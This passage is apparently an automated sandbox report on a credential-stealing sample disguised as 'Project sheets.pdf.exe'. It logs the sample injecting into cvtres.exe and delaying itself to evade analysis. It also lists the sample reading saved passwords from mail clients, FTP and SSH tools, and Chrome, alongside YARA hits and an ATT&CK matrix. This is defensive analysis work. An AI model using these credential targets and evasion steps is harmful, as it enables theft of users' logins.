                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exe TID: 5304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4052Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 60000Jump to behavior
                Source: Project sheets.pdf.exe, 00000000.00000002.246724890.000000000437C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: Project sheets.pdf.exe, 00000000.00000002.246969178.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246906409.00000000043C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: Project sheets.pdf.exe, 00000000.00000002.246471391.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246636872.000000000431E000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                Source: Project sheets.pdf.exe, 00000000.00000002.247111650.0000000004455000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 415000Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4A0000Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4CF1008Jump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeQueries volume information: C:\Users\user\Desktop\Project sheets.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00406069 GetUserNameW,3_2_00406069

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: PopPassword3_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: SmtpPassword3_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium3
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
                Obfuscated Files or Information
                2
                Credentials in Registry
                13
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration3
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                Software Packing
                NTDS11
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer113
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Project sheets.pdf.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                3.0.cvtres.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.Project sheets.pdf.exe.41d5530.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
